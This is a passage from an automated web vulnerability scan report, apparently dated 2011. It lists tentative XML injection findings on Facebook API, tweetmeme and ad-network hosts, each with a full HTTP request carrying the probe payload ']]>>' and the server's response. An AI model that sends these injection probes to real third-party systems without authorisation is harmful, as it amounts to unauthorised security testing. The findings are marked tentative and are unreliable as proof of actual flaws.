Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1088

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.2. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /bluepixel/cnt-gif1x1.php]]>>?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:46:56 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1088

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.3. http://api.ak.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.ak.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&format=json]]>>&urls=http%3A%2F%2Fsmartcompanygrowth.com%2Fbus-growth-svcs%2Fbus-devlpmnt-svcs%2Fbusiness-reputation-svcs%2F&callback=jsonp1303691673627 HTTP/1.1
Host: api.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.28.2.110
X-Cnection: close
Content-Length: 850
Cache-Control: public, max-age=120
Expires: Mon, 25 Apr 2011 00:50:52 GMT
Date: Mon, 25 Apr 2011 00:48:52 GMT
Connection: close

jsonp1303691673627('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

10.4. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?format=json]]>>&method=links.getStats&urls=http%253A%252F%252Fwww.infusionblog.com%252F&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 24 Apr 2011 18:43:15 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.36.14.114
X-Cnection: close
Date: Mon, 25 Apr 2011 01:41:15 GMT
Content-Length: 735

aptureJsonCallback0('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

10.5. http://api.tweetmeme.com/url_info.jsonc [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /url_info.jsonc]]>>?url=http%3A%2F%2Fwww.infusionblog.com%2F&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 01:41:00 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 227
X-Url-Lookup: OrAdd (265)
X-Served-By: ded2061
Content-Length: 497

<?xml version="1.0" encoding="UTF-8"?>
<result><status>success</status><story><title>Infusionsoft Blog</title><url>http://www.infusionblog.com/</url><media_type>news</media_type><created_at>2009-03-05
...[SNIP]...

10.6. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RNYnkg2EM_1392081529.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i]]>>/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420036&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658420051&frm=1&adk=2614322350&ga_vid=1350158520.1303658420&ga_sid=1303658420&ga_hid=1723873345&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=18
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:38 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:23:40 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.7. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RNYnkg2EM_1392081529.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i/0RNYnkg2EM_1392081529.html]]>>?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420036&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658420051&frm=1&adk=2614322350&ga_vid=1350158520.1303658420&ga_sid=1303658420&ga_hid=1723873345&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=18
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:46 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:23:48 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.8. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i]]>>/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:19 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:23:21 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.9. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i/0RkPQrQRFy_1341446950.html]]>>?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:29 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:23:31 GMT
Pragma: no-cache
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.10. http://cdn.w55c.net/i/0RphY9og2j_721933665.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RphY9og2j_721933665.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i]]>>/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:34 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:23:35 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.11. http://cdn.w55c.net/i/0RphY9og2j_721933665.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RphY9og2j_721933665.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i/0RphY9og2j_721933665.html]]>>?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
